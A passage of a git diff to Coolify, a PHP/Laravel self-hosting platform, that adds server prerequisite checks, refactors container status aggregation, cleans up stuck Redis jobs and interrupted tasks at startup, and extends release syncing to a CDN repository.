remote_process($command, $server); + } +} diff --git a/app/Actions/Server/UpdateCoolify.php b/app/Actions/Server/UpdateCoolify.php index 2a06428e2..0bf763d78 100644 --- a/app/Actions/Server/UpdateCoolify.php +++ b/app/Actions/Server/UpdateCoolify.php @@ -2,7 +2,6 @@ namespace App\Actions\Server; -use App\Jobs\PullHelperImageJob; use App\Models\Server; use Illuminate\Support\Sleep; use Lorisleiva\Actions\Concerns\AsAction; @@ -50,7 +49,9 @@ public function handle($manual_update = false) private function update() { - PullHelperImageJob::dispatch($this->server); + $helperImage = config('constants.coolify.helper_image'); + $latest_version = getHelperVersion(); + instant_remote_process(["docker pull -q {$helperImage}:{$latest_version}"], $this->server, false); $image = config('constants.coolify.registry_url').'/coollabsio/coolify:'.$this->latestVersion; instant_remote_process(["docker pull -q $image"], $this->server, false); diff --git a/app/Actions/Server/ValidatePrerequisites.php b/app/Actions/Server/ValidatePrerequisites.php new file mode 100644 index 000000000..23c1db1d0 --- /dev/null +++ b/app/Actions/Server/ValidatePrerequisites.php @@ -0,0 +1,40 @@ +, found: array} + */ + public function handle(Server $server): array + { + $requiredCommands = ['git', 'curl', 'jq']; + $missing = []; + $found = []; + + foreach ($requiredCommands as $cmd) { + $result = instant_remote_process(["command -v {$cmd}"], $server, false); + if (! $result) { + $missing[] = $cmd; + } else { + $found[] = $cmd; + } + } + + return [ + 'success' => empty($missing), + 'missing' => $missing, + 'found' => $found, + ]; + } +} diff --git a/app/Actions/Server/ValidateServer.php b/app/Actions/Server/ValidateServer.php index 55b37a77c..0a20deae5 100644 --- a/app/Actions/Server/ValidateServer.php +++ b/app/Actions/Server/ValidateServer.php @@ -45,6 +45,16 @@ public function handle(Server $server) throw new \Exception($this->error); } + $validationResult = $server->validatePrerequisites(); + if (! $validationResult['success']) { + $missingCommands = implode(', ', $validationResult['missing']); + $this->error = "Prerequisites ({$missingCommands}) are not installed. Please install them before continuing or use the validation with installation endpoint."; + $server->update([ + 'validation_logs' => $this->error, + ]); + throw new \Exception($this->error); + } + $this->docker_installed = $server->validateDockerEngine(); $this->docker_compose_installed = $server->validateDockerCompose(); if (! $this->docker_installed || ! $this->docker_compose_installed) { diff --git a/app/Actions/Service/StartService.php b/app/Actions/Service/StartService.php index dfef6a566..6b5e1d4ac 100644 --- a/app/Actions/Service/StartService.php +++ b/app/Actions/Service/StartService.php @@ -20,18 +20,23 @@ public function handle(Service $service, bool $pullLatestImages = false, bool $s } $service->saveComposeConfigs(); $service->isConfigurationChanged(save: true); - $commands[] = 'cd '.$service->workdir(); - $commands[] = "echo 'Saved configuration files to {$service->workdir()}.'"; + $workdir = $service->workdir(); + // $commands[] = "cd {$workdir}"; + $commands[] = "echo 'Saved configuration files to {$workdir}.'"; + // Ensure .env exists in the correct directory before docker compose tries to load it + // This is defensive programming - saveComposeConfigs() already creates it, + // but we guarantee it here in case of any edge cases or manual deployments + $commands[] = "touch {$workdir}/.env"; if ($pullLatestImages) { $commands[] = "echo 'Pulling images.'"; - $commands[] = 'docker compose pull'; + $commands[] = "docker compose --project-directory {$workdir} pull"; } if ($service->networks()->count() > 0) { $commands[] = "echo 'Creating Docker network.'"; $commands[] = "docker network inspect $service->uuid >/dev/null 2>&1 || docker network create --attachable $service->uuid"; } $commands[] = 'echo Starting service.'; - $commands[] = 'docker compose up -d --remove-orphans --force-recreate --build'; + $commands[] = "docker compose --project-directory {$workdir} -f {$workdir}/docker-compose.yml --project-name {$service->uuid} up -d --remove-orphans --force-recreate --build"; $commands[] = "docker network connect $service->uuid coolify-proxy >/dev/null 2>&1 || true"; if (data_get($service, 'connect_to_docker_network')) { $compose = data_get($service, 'docker_compose', []); diff --git a/app/Actions/Shared/ComplexStatusCheck.php b/app/Actions/Shared/ComplexStatusCheck.php index e06136e3c..3649be986 100644 --- a/app/Actions/Shared/ComplexStatusCheck.php +++ b/app/Actions/Shared/ComplexStatusCheck.php @@ -3,11 +3,14 @@ namespace App\Actions\Shared; use App\Models\Application; +use App\Services\ContainerStatusAggregator; +use App\Traits\CalculatesExcludedStatus; use Lorisleiva\Actions\Concerns\AsAction; class ComplexStatusCheck { use AsAction; + use CalculatesExcludedStatus; public function handle(Application $application) { @@ -17,11 +20,11 @@ public function handle(Application $application) $is_main_server = $application->destination->server->id === $server->id; if (! $server->isFunctional()) { if ($is_main_server) { - $application->update(['status' => 'exited:unhealthy']); + $application->update(['status' => 'exited']); continue; } else { - $application->additional_servers()->updateExistingPivot($server->id, ['status' => 'exited:unhealthy']); + $application->additional_servers()->updateExistingPivot($server->id, ['status' => 'exited']); continue; } @@ -46,11 +49,11 @@ public function handle(Application $application) } } else { if ($is_main_server) { - $application->update(['status' => 'exited:unhealthy']); + $application->update(['status' => 'exited']); continue; } else { - $application->additional_servers()->updateExistingPivot($server->id, ['status' => 'exited:unhealthy']); + $application->additional_servers()->updateExistingPivot($server->id, ['status' => 'exited']); continue; } @@ -61,74 +64,25 @@ public function handle(Application $application) private function aggregateContainerStatuses($application, $containers) { $dockerComposeRaw = data_get($application, 'docker_compose_raw'); - $excludedContainers = collect(); + $excludedContainers = $this->getExcludedContainersFromDockerCompose($dockerComposeRaw); - if ($dockerComposeRaw) { - try { - $dockerCompose = \Symfony\Component\Yaml\Yaml::parse($dockerComposeRaw); - $services = data_get($dockerCompose, 'services', []); - - foreach ($services as $serviceName => $serviceConfig) { - $excludeFromHc = data_get($serviceConfig, 'exclude_from_hc', false); - $restartPolicy = data_get($serviceConfig, 'restart', 'always'); - - if ($excludeFromHc || $restartPolicy === 'no') { - $excludedContainers->push($serviceName); - } - } - } catch (\Exception $e) { - // If we can't parse, treat all containers as included - } - } - - $hasRunning = false; - $hasRestarting = false; - $hasUnhealthy = false; - $hasExited = false; - $relevantContainerCount = 0; - - foreach ($containers as $container) { + // Filter non-excluded containers + $relevantContainers = collect($containers)->filter(function ($container) use ($excludedContainers) { $labels = data_get($container, 'Config.Labels', []); $serviceName = data_get($labels, 'com.docker.compose.service'); - if ($serviceName && $excludedContainers->contains($serviceName)) { - continue; - } + return ! ($serviceName && $excludedContainers->contains($serviceName)); + }); - $relevantContainerCount++; - $containerStatus = data_get($container, 'State.Status'); - $containerHealth = data_get($container, 'State.Health.Status', 'unhealthy'); - - if ($containerStatus === 'restarting') { - $hasRestarting = true; - $hasUnhealthy = true; - } elseif ($containerStatus === 'running') { - $hasRunning = true; - if ($containerHealth === 'unhealthy') { - $hasUnhealthy = true; - } - } elseif ($containerStatus === 'exited') { - $hasExited = true; - $hasUnhealthy = true; - } + // If all containers are excluded, calculate status from excluded containers + // but mark it with :excluded to indicate monitoring is disabled + if ($relevantContainers->isEmpty()) { + return $this->calculateExcludedStatus($containers, $excludedContainers); } - if ($relevantContainerCount === 0) { - return 'running:healthy'; - } + // Use ContainerStatusAggregator service for state machine logic + $aggregator = new ContainerStatusAggregator; - if ($hasRestarting) { - return 'degraded:unhealthy'; - } - - if ($hasRunning && $hasExited) { - return 'degraded:unhealthy'; - } - - if ($hasRunning) { - return $hasUnhealthy ? 'running:unhealthy' : 'running:healthy'; - } - - return 'exited:unhealthy'; + return $aggregator->aggregateFromContainers($relevantContainers); } } diff --git a/app/Console/Commands/CheckTraefikVersionCommand.php b/app/Console/Commands/CheckTraefikVersionCommand.php new file mode 100644 index 000000000..48cc78093 --- /dev/null +++ b/app/Console/Commands/CheckTraefikVersionCommand.php @@ -0,0 +1,30 @@ +info('Checking Traefik versions on all servers...'); + + try { + CheckTraefikVersionJob::dispatch(); + $this->info('Traefik version check job dispatched successfully.'); + $this->info('Notifications will be sent to teams with outdated Traefik versions.'); + + return Command::SUCCESS; + } catch (\Exception $e) { + $this->error('Failed to dispatch Traefik version check job: '.$e->getMessage()); + + return Command::FAILURE; + } + } +} diff --git a/app/Console/Commands/CleanupNames.php b/app/Console/Commands/CleanupNames.php index 2992e32b9..2451dc3ed 100644 --- a/app/Console/Commands/CleanupNames.php +++ b/app/Console/Commands/CleanupNames.php @@ -63,8 +63,6 @@ class CleanupNames extends Command public function handle(): int { - $this->info('🔍 Scanning for invalid characters in name fields...'); - if ($this->option('backup') && ! $this->option('dry-run')) { $this->createBackup(); } @@ -75,7 +73,7 @@ public function handle(): int : $this->modelsToClean; if ($modelFilter && ! isset($this->modelsToClean[$modelFilter])) { - $this->error("❌ Unknown model: {$modelFilter}"); + $this->error("Unknown model: {$modelFilter}"); $this->info('Available models: '.implode(', ', array_keys($this->modelsToClean))); return self::FAILURE; @@ -88,19 +86,21 @@ public function handle(): int $this->processModel($modelName, $modelClass); } - $this->displaySummary(); - if (! $this->option('dry-run') && $this->totalCleaned > 0) { $this->logChanges(); } + if ($this->option('dry-run')) { + $this->info("Name cleanup: would sanitize {$this->totalCleaned} records"); + } else { + $this->info("Name cleanup: sanitized {$this->totalCleaned} records"); + } + return self::SUCCESS; } protected function processModel(string $modelName, string $modelClass): void { - $this->info("\n📋 Processing {$modelName}..."); - try { $records = $modelClass::all(['id', 'name']); $cleaned = 0; @@ -128,21 +128,17 @@ protected function processModel(string $modelName, string $modelClass): void $cleaned++; $this->totalCleaned++; - $this->warn(" 🧹 {$modelName} #{$record->id}:"); - $this->line(' From: '.$this->truncate($originalName, 80)); - $this->line(' To: '.$this->truncate($sanitizedName, 80)); + // Only log in dry-run mode to preview changes + if ($this->option('dry-run')) { + $this->warn(" 🧹 {$modelName} #{$record->id}:"); + $this->line(' From: '.$this->truncate($originalName, 80)); + $this->line(' To: '.$this->truncate($sanitizedName, 80)); + } } } - if ($cleaned > 0) { - $action = $this->option('dry-run') ? 'would be sanitized' : 'sanitized'; - $this->info(" ✅ {$cleaned}/{$records->count()} records {$action}"); - } else { - $this->info(' ✨ No invalid characters found'); - } - } catch (\Exception $e) { - $this->error(" ❌ Error processing {$modelName}: ".$e->getMessage()); + $this->error("Error processing {$modelName}: ".$e->getMessage()); } } @@ -165,28 +161,6 @@ protected function sanitizeName(string $name): string return $sanitized; } - protected function displaySummary(): void - { - $this->info("\n".str_repeat('=', 60)); - $this->info('📊 CLEANUP SUMMARY'); - $this->info(str_repeat('=', 60)); - - $this->line("Records processed: {$this->totalProcessed}"); - $this->line("Records with invalid characters: {$this->totalCleaned}"); - - if ($this->option('dry-run')) { - $this->warn("\n🔍 DRY RUN - No changes were made to the database"); - $this->info('Run without --dry-run to apply these changes'); - } else { - if ($this->totalCleaned > 0) { - $this->info("\n✅ Database successfully sanitized!"); - $this->info('Changes logged to storage/logs/name-cleanup.log'); - } else { - $this->info("\n✨ No cleanup needed - all names are valid!"); - } - } - } - protected function logChanges(): void { $logFile = storage_path('logs/name-cleanup.log'); @@ -208,8 +182,6 @@ protected function logChanges(): void protected function createBackup(): void { - $this->info('💾 Creating database backup...'); - try { $backupFile = storage_path('backups/name-cleanup-backup-'.now()->format('Y-m-d-H-i-s').'.sql'); @@ -229,15 +201,9 @@ protected function createBackup(): void ); exec($command, $output, $returnCode); - - if ($returnCode === 0) { - $this->info("✅ Backup created: {$backupFile}"); - } else { - $this->warn('⚠️ Backup creation may have failed. Proceeding anyway...'); - } } catch (\Exception $e) { - $this->warn('⚠️ Could not create backup: '.$e->getMessage()); - $this->warn('Proceeding without backup...'); + // Log failure but continue - backup is optional safeguard + Log::warning('Name cleanup backup failed', ['error' => $e->getMessage()]); } } diff --git a/app/Console/Commands/CleanupRedis.php b/app/Console/Commands/CleanupRedis.php index f6a2de75b..199e168fc 100644 --- a/app/Console/Commands/CleanupRedis.php +++ b/app/Console/Commands/CleanupRedis.php @@ -7,7 +7,7 @@ class CleanupRedis extends Command { - protected $signature = 'cleanup:redis {--dry-run : Show what would be deleted without actually deleting} {--skip-overlapping : Skip overlapping queue cleanup} {--clear-locks : Clear stale WithoutOverlapping locks}'; + protected $signature = 'cleanup:redis {--dry-run : Show what would be deleted without actually deleting} {--skip-overlapping : Skip overlapping queue cleanup} {--clear-locks : Clear stale WithoutOverlapping locks} {--restart : Aggressive cleanup mode for system restart (marks all processing jobs as failed)}'; protected $description = 'Cleanup Redis (Horizon jobs, metrics, overlapping queues, cache locks, and related data)'; @@ -18,10 +18,6 @@ public function handle() $dryRun = $this->option('dry-run'); $skipOverlapping = $this->option('skip-overlapping'); - if ($dryRun) { - $this->info('DRY RUN MODE - No data will be deleted'); - } - $deletedCount = 0; $totalKeys = 0; @@ -29,8 +25,6 @@ public function handle() $keys = $redis->keys('*'); $totalKeys = count($keys); - $this->info("Scanning {$totalKeys} keys for cleanup..."); - foreach ($keys as $key) { $keyWithoutPrefix = str_replace($prefix, '', $key); $type = $redis->command('type', [$keyWithoutPrefix]); @@ -51,22 +45,27 @@ public function handle() // Clean up overlapping queues if not skipped if (! $skipOverlapping) { - $this->info('Cleaning up overlapping queues...'); $overlappingCleaned = $this->cleanupOverlappingQueues($redis, $prefix, $dryRun); $deletedCount += $overlappingCleaned; } // Clean up stale cache locks (WithoutOverlapping middleware) if ($this->option('clear-locks')) { - $this->info('Cleaning up stale cache locks...'); $locksCleaned = $this->cleanupCacheLocks($dryRun); $deletedCount += $locksCleaned; } + // Clean up stuck jobs (restart mode = aggressive, runtime mode = conservative) + $isRestart = $this->option('restart'); + if ($isRestart || $this->option('clear-locks')) { + $jobsCleaned = $this->cleanupStuckJobs($redis, $prefix, $dryRun, $isRestart); + $deletedCount += $jobsCleaned; + } + if ($dryRun) { - $this->info("DRY RUN: Would delete {$deletedCount} out of {$totalKeys} keys"); + $this->info("Redis cleanup: would delete {$deletedCount} items"); } else { - $this->info("Deleted {$deletedCount} out of {$totalKeys} keys"); + $this->info("Redis cleanup: deleted {$deletedCount} items"); } } @@ -77,11 +76,8 @@ private function shouldDeleteHashKey($redis, $keyWithoutPrefix, $dryRun) // Delete completed and failed jobs if (in_array($status, ['completed', 'failed'])) { - if ($dryRun) { - $this->line("Would delete job: {$keyWithoutPrefix} (status: {$status})"); - } else { + if (! $dryRun) { $redis->command('del', [$keyWithoutPrefix]); - $this->line("Deleted job: {$keyWithoutPrefix} (status: {$status})"); } return true; @@ -107,11 +103,8 @@ private function shouldDeleteOtherKey($redis, $keyWithoutPrefix, $fullKey, $dryR foreach ($patterns as $pattern => $description) { if (str_contains($keyWithoutPrefix, $pattern)) { - if ($dryRun) { - $this->line("Would delete {$description}: {$keyWithoutPrefix}"); - } else { + if (! $dryRun) { $redis->command('del', [$keyWithoutPrefix]); - $this->line("Deleted {$description}: {$keyWithoutPrefix}"); } return true; @@ -124,11 +117,8 @@ private function shouldDeleteOtherKey($redis, $keyWithoutPrefix, $fullKey, $dryR $weekAgo = now()->subDays(7)->timestamp; if ($timestamp < $weekAgo) { - if ($dryRun) { - $this->line("Would delete old timestamped data: {$keyWithoutPrefix}"); - } else { + if (! $dryRun) { $redis->command('del', [$keyWithoutPrefix]); - $this->line("Deleted old timestamped data: {$keyWithoutPrefix}"); } return true; @@ -152,8 +142,6 @@ private function cleanupOverlappingQueues($redis, $prefix, $dryRun) } } - $this->info('Found '.count($queueKeys).' queue-related keys'); - // Group queues by name pattern to find duplicates $queueGroups = []; foreach ($queueKeys as $queueKey) { @@ -185,7 +173,6 @@ private function cleanupOverlappingQueues($redis, $prefix, $dryRun) private function deduplicateQueueGroup($redis, $baseName, $keys, $dryRun) { $cleanedCount = 0; - $this->line("Processing queue group: {$baseName} (".count($keys).' keys)'); // Sort keys to keep the most recent one usort($keys, function ($a, $b) { @@ -236,11 +223,8 @@ private function deduplicateQueueGroup($redis, $baseName, $keys, $dryRun) } if ($shouldDelete) { - if ($dryRun) { - $this->line(" Would delete empty queue: {$redundantKey}"); - } else { + if (! $dryRun) { $redis->command('del', [$redundantKey]); - $this->line(" Deleted empty queue: {$redundantKey}"); } $cleanedCount++; } @@ -263,15 +247,12 @@ private function deduplicateQueueContents($redis, $queueKey, $dryRun) if (count($uniqueItems) < count($items)) { $duplicates = count($items) - count($uniqueItems); - if ($dryRun) { - $this->line(" Would remove {$duplicates} duplicate jobs from queue: {$queueKey}"); - } else { + if (! $dryRun) { // Rebuild the list with unique items $redis->command('del', [$queueKey]); foreach (array_reverse($uniqueItems) as $item) { $redis->command('lpush', [$queueKey, $item]); } - $this->line(" Removed {$duplicates} duplicate jobs from queue: {$queueKey}"); } $cleanedCount += $duplicates; } @@ -299,13 +280,9 @@ private function cleanupCacheLocks(bool $dryRun): int } } if (empty($lockKeys)) { - $this->info(' No cache locks found.'); - return 0; } - $this->info(' Found '.count($lockKeys).' cache lock(s)'); - foreach ($lockKeys as $lockKey) { // Check TTL to identify stale locks $ttl = $redis->ttl($lockKey); @@ -318,16 +295,129 @@ private function cleanupCacheLocks(bool $dryRun): int $this->warn(" Would delete STALE lock (no expiration): {$lockKey}"); } else { $redis->del($lockKey); - $this->info(" ✓ Deleted STALE lock: {$lockKey}"); } $cleanedCount++; - } elseif ($ttl > 0) { - $this->line(" Skipping active lock (expires in {$ttl}s): {$lockKey}"); } } - if ($cleanedCount === 0) { - $this->info(' No stale locks found (all locks have expiration set)'); + return $cleanedCount; + } + + /** + * Clean up stuck jobs based on mode (restart vs runtime). + * + * @param mixed $redis Redis connection + * @param string $prefix Horizon prefix + * @param bool $dryRun Dry run mode + * @param bool $isRestart Restart mode (aggressive) vs runtime mode (conservative) + * @return int Number of jobs cleaned + */ + private function cleanupStuckJobs($redis, string $prefix, bool $dryRun, bool $isRestart): int + { + $cleanedCount = 0; + $now = time(); + + // Get all keys with the horizon prefix + $cursor = 0; + $keys = []; + do { + $result = $redis->scan($cursor, ['match' => '*', 'count' => 100]); + + // Guard against scan() returning false + if ($result === false) { + $this->error('Redis scan failed, stopping key retrieval'); + break; + } + + $cursor = $result[0]; + $keys = array_merge($keys, $result[1]); + } while ($cursor !== 0); + + foreach ($keys as $key) { + $keyWithoutPrefix = str_replace($prefix, '', $key); + $type = $redis->command('type', [$keyWithoutPrefix]); + + // Only process hash-type keys (individual jobs) + if ($type !== 5) { + continue; + } + + $data = $redis->command('hgetall', [$keyWithoutPrefix]); + $status = data_get($data, 'status'); + $payload = data_get($data, 'payload'); + + // Only process jobs in "processing" or "reserved" state + if (! in_array($status, ['processing', 'reserved'])) { + continue; + } + + // Parse job payload to get job class and started time + $payloadData = json_decode($payload, true); + + // Check for JSON decode errors + if ($payloadData === null || json_last_error() !== JSON_ERROR_NONE) { + $errorMsg = json_last_error_msg(); + $truncatedPayload = is_string($payload) ? substr($payload, 0, 200) : 'non-string payload'; + $this->error("Failed to decode job payload for {$keyWithoutPrefix}: {$errorMsg}. Payload: {$truncatedPayload}"); + + continue; + } + + $jobClass = data_get($payloadData, 'displayName', 'Unknown'); + + // Prefer reserved_at (when job started processing), fallback to created_at + $reservedAt = (int) data_get($data, 'reserved_at', 0); + $createdAt = (int) data_get($data, 'created_at', 0); + $startTime = $reservedAt ?: $createdAt; + + // If we can't determine when the job started, skip it + if (! $startTime) { + continue; + } + + // Calculate how long the job has been processing + $processingTime = $now - $startTime; + + $shouldFail = false; + $reason = ''; + + if ($isRestart) { + // RESTART MODE: Mark ALL processing/reserved jobs as failed + // Safe because all workers are dead on restart + $shouldFail = true; + $reason = 'System restart - all workers terminated'; + } else { + // RUNTIME MODE: Only mark truly stuck jobs as failed + // Be conservative to avoid killing legitimate long-running jobs + + // Skip ApplicationDeploymentJob entirely (has dynamic_timeout, can run 2+ hours) + if (str_contains($jobClass, 'ApplicationDeploymentJob')) { + continue; + } + + // Skip DatabaseBackupJob (large backups can take hours) + if (str_contains($jobClass, 'DatabaseBackupJob')) { + continue; + } + + // For other jobs, only fail if processing > 12 hours + if ($processingTime > 43200) { // 12 hours + $shouldFail = true; + $reason = 'Processing for more than 12 hours'; + } + } + + if ($shouldFail) { + if ($dryRun) { + $this->warn(" Would mark as FAILED: {$jobClass} (processing for ".round($processingTime / 60, 1)." min) - {$reason}"); + } else { + // Mark job as failed + $redis->command('hset', [$keyWithoutPrefix, 'status', 'failed']); + $redis->command('hset', [$keyWithoutPrefix, 'failed_at', $now]); + $redis->command('hset', [$keyWithoutPrefix, 'exception', "Job cleaned up by cleanup:redis - {$reason}"]); + } + $cleanedCount++; + } } return $cleanedCount; diff --git a/app/Console/Commands/CleanupStuckedResources.php b/app/Console/Commands/CleanupStuckedResources.php index 0b13462ef..165a3ae21 100644 --- a/app/Console/Commands/CleanupStuckedResources.php +++ b/app/Console/Commands/CleanupStuckedResources.php @@ -222,9 +222,14 @@ private function cleanup_stucked_resources() try { $scheduled_backups = ScheduledDatabaseBackup::all(); foreach ($scheduled_backups as $scheduled_backup) { - if (! $scheduled_backup->server()) { - echo "Deleting stuck scheduledbackup: {$scheduled_backup->name}\n"; - $scheduled_backup->delete(); + try { + $server = $scheduled_backup->server(); + if (! $server) { + echo "Deleting stuck scheduledbackup: {$scheduled_backup->name}\n"; + $scheduled_backup->delete(); + } + } catch (\Throwable $e) { + echo "Error checking server for scheduledbackup {$scheduled_backup->id}: {$e->getMessage()}\n"; } } } catch (\Throwable $e) { @@ -416,7 +421,7 @@ private function cleanup_stucked_resources() foreach ($serviceApplications as $service) { if (! data_get($service, 'service')) { echo 'ServiceApplication without service: '.$service->name.'\n'; - DeleteResourceJob::dispatch($service); + $service->forceDelete(); continue; } @@ -429,7 +434,7 @@ private function cleanup_stucked_resources() foreach ($serviceDatabases as $service) { if (! data_get($service, 'service')) { echo 'ServiceDatabase without service: '.$service->name.'\n'; - DeleteResourceJob::dispatch($service); + $service->forceDelete(); continue; } diff --git a/app/Console/Commands/Dev.php b/app/Console/Commands/Dev.php index 8f26d78ff..acc6dc2f9 100644 --- a/app/Console/Commands/Dev.php +++ b/app/Console/Commands/Dev.php @@ -4,6 +4,9 @@ use App\Jobs\CheckHelperImageJob; use App\Models\InstanceSettings; +use App\Models\ScheduledDatabaseBackupExecution; +use App\Models\ScheduledTaskExecution; +use Carbon\Carbon; use Illuminate\Console\Command; use Illuminate\Support\Facades\Artisan; @@ -45,6 +48,44 @@ public function init() } else { echo "Instance already initialized.\n"; } + + // Clean up stuck jobs and stale locks on development startup + try { + echo "Cleaning up Redis (stuck jobs and stale locks)...\n"; + Artisan::call('cleanup:redis', ['--restart' => true, '--clear-locks' => true]); + echo "Redis cleanup completed.\n"; + } catch (\Throwable $e) { + echo "Error in cleanup:redis: {$e->getMessage()}\n"; + } + + try { + $updatedTaskCount = ScheduledTaskExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + if ($updatedTaskCount > 0) { + echo "Marked {$updatedTaskCount} stuck scheduled task executions as failed\n"; + } + } catch (\Throwable $e) { + echo "Could not cleanup stuck scheduled task executions: {$e->getMessage()}\n"; + } + + try { + $updatedBackupCount = ScheduledDatabaseBackupExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + if ($updatedBackupCount > 0) { + echo "Marked {$updatedBackupCount} stuck database backup executions as failed\n"; + } + } catch (\Throwable $e) { + echo "Could not cleanup stuck database backup executions: {$e->getMessage()}\n"; + } + CheckHelperImageJob::dispatch(); } } diff --git a/app/Console/Commands/Emails.php b/app/Console/Commands/Emails.php index a022d54dc..43ba06804 100644 --- a/app/Console/Commands/Emails.php +++ b/app/Console/Commands/Emails.php @@ -167,7 +167,7 @@ public function handle() ]); } $output = 'Because of an error, the backup of the database '.$db->name.' failed.'; - $this->mail = (new BackupFailed($backup, $db, $output))->toMail(); + $this->mail = (new BackupFailed($backup, $db, $output, $backup->database_name ?? 'unknown'))->toMail(); $this->sendEmail(); break; case 'backup-success': diff --git a/app/Console/Commands/Init.php b/app/Console/Commands/Init.php index 4bc818f0a..66cb77838 100644 --- a/app/Console/Commands/Init.php +++ b/app/Console/Commands/Init.php @@ -10,9 +10,12 @@ use App\Models\Environment; use App\Models\InstanceSettings; use App\Models\ScheduledDatabaseBackup; +use App\Models\ScheduledDatabaseBackupExecution; +use App\Models\ScheduledTaskExecution; use App\Models\Server; use App\Models\StandalonePostgresql; use App\Models\User; +use Carbon\Carbon; use Illuminate\Console\Command; use Illuminate\Support\Facades\Artisan; use Illuminate\Support\Facades\File; @@ -73,7 +76,7 @@ public function handle() $this->cleanupUnusedNetworkFromCoolifyProxy(); try { - $this->call('cleanup:redis', ['--clear-locks' => true]); + $this->call('cleanup:redis', ['--restart' => true, '--clear-locks' => true]); } catch (\Throwable $e) { echo "Error in cleanup:redis command: {$e->getMessage()}\n"; } @@ -86,6 +89,7 @@ public function handle() $this->call('cleanup:stucked-resources'); } catch (\Throwable $e) { echo "Error in cleanup:stucked-resources command: {$e->getMessage()}\n"; + echo "Continuing with initialization - cleanup errors will not prevent Coolify from starting\n"; } try { $updatedCount = ApplicationDeploymentQueue::whereIn('status', [ @@ -102,6 +106,34 @@ public function handle() echo "Could not cleanup inprogress deployments: {$e->getMessage()}\n"; } + try { + $updatedTaskCount = ScheduledTaskExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + if ($updatedTaskCount > 0) { + echo "Marked {$updatedTaskCount} stuck scheduled task executions as failed\n"; + } + } catch (\Throwable $e) { + echo "Could not cleanup stuck scheduled task executions: {$e->getMessage()}\n"; + } + + try { + $updatedBackupCount = ScheduledDatabaseBackupExecution::where('status', 'running')->update([ + 'status' => 'failed', + 'message' => 'Marked as failed during Coolify startup - job was interrupted', + 'finished_at' => Carbon::now(), + ]); + + if ($updatedBackupCount > 0) { + echo "Marked {$updatedBackupCount} stuck database backup executions as failed\n"; + } + } catch (\Throwable $e) { + echo "Could not cleanup stuck database backup executions: {$e->getMessage()}\n"; + } + try { $localhost = $this->servers->where('id', 0)->first(); if ($localhost) { diff --git a/app/Console/Commands/SyncBunny.php b/app/Console/Commands/SyncBunny.php index e634feadb..0a98f1dc8 100644 --- a/app/Console/Commands/SyncBunny.php +++ b/app/Console/Commands/SyncBunny.php @@ -16,7 +16,7 @@ class SyncBunny extends Command * * @var string */ - protected $signature = 'sync:bunny {--templates} {--release} {--github-releases} {--nightly}'; + protected $signature = 'sync:bunny {--templates} {--release} {--github-releases} {--github-versions} {--nightly}'; /** * The console command description. @@ -50,6 +50,7 @@ private function syncReleasesToGitHubRepo(): bool // Clone the repository $this->info('Cloning coolify-cdn repository...'); + $output = []; exec('gh repo clone coollabsio/coolify-cdn '.escapeshellarg($tmpDir).' 2>&1', $output, $returnCode); if ($returnCode !== 0) { $this->error('Failed to clone repository: '.implode("\n", $output)); @@ -59,6 +60,7 @@ private function syncReleasesToGitHubRepo(): bool // Create feature branch $this->info('Creating feature branch...'); + $output = []; exec('cd '.escapeshellarg($tmpDir).' && git checkout -b '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); if ($returnCode !== 0) { $this->error('Failed to create branch: '.implode("\n", $output)); @@ -70,12 +72,25 @@ private function syncReleasesToGitHubRepo(): bool // Write releases.json $this->info('Writing releases.json...'); $releasesPath = "$tmpDir/json/releases.json"; + $releasesDir = dirname($releasesPath); + + // Ensure directory exists + if (! is_dir($releasesDir)) { + $this->info("Creating directory: $releasesDir"); + if (! mkdir($releasesDir, 0755, true)) { + $this->error("Failed to create directory: $releasesDir"); + exec('rm -rf '.escapeshellarg($tmpDir)); + + return false; + } + } + $jsonContent = json_encode($releases, JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES); $bytesWritten = file_put_contents($releasesPath, $jsonContent); if ($bytesWritten === false) { $this->error("Failed to write releases.json to: $releasesPath"); - $this->error('Possible reasons: directory does not exist, permission denied, or disk full.'); + $this->error('Possible reasons: permission denied or disk full.'); exec('rm -rf '.escapeshellarg($tmpDir)); return false; @@ -83,6 +98,7 @@ private function syncReleasesToGitHubRepo(): bool // Stage and commit $this->info('Committing changes...'); + $output = []; exec('cd '.escapeshellarg($tmpDir).' && git add json/releases.json 2>&1', $output, $returnCode); if ($returnCode !== 0) { $this->error('Failed to stage changes: '.implode("\n", $output)); @@ -120,6 +136,7 @@ private function syncReleasesToGitHubRepo(): bool // Push to remote $this->info('Pushing branch to remote...'); + $output = []; exec('cd '.escapeshellarg($tmpDir).' && git push origin '.escapeshellarg($branchName).' 2>&1', $output, $returnCode); if ($returnCode !== 0) { $this->error('Failed to push branch: '.implode("\n", $output)); @@ -133,6 +150,7 @@ private function syncReleasesToGitHubRepo(): bool $prTitle = 'Update releases.json - '.date('Y-m-d H:i:s'); $prBody = 'Automated update of releases.json with latest '.count($releases).' releases from GitHub API'; $prCommand = 'gh pr create --repo coollabsio/coolify-cdn --title '.escapeshellarg($prTitle).' --body '.escapeshellarg($prBody).' --base main --head '.escapeshellarg($branchName).' 2>&1'; + $output = []; exec($prCommand, $output, $returnCode); // Clean up @@ -158,6 +176,343 @@ private function syncReleasesToGitHubRepo(): bool } } + /** + * Sync both releases.json and versions.json to GitHub repository in one PR + */ + private function syncReleasesAndVersionsToGitHubRepo(string $versionsLocation, bool $nightly = false): bool + { + $this->info('Syncing releases.json and versions.json to GitHub repository...'); + try { + // 1. Fetch releases from GitHub API + $this->info('Fetching releases from GitHub API...'); + $response = Http::timeout(30) + ->get('https://api.github.com/repos/coollabsio/coolify/releases', [ + 'per_page' => 30, + ]); + + if (! $response->successful()) { + $this->error('Failed to fetch releases from GitHub: '.$response->status()); + + return false; + } + + $releases = $response->json(); + + // 2. Read versions.json + if (! file_exists($versionsLocation)) { + $this->error("versions.json not found at: $versionsLocation"); + + return false; + } + + $file = file_get_contents($versionsLocation); + $versionsJson = json_decode($file, true); + $actualVersion = data_get($versionsJson, 'coolify.v4.version'); + + $timestamp = time(); + $tmpDir = sys_get_temp_dir().'/coolify-cdn-combined-'.$timestamp; + $branchName = 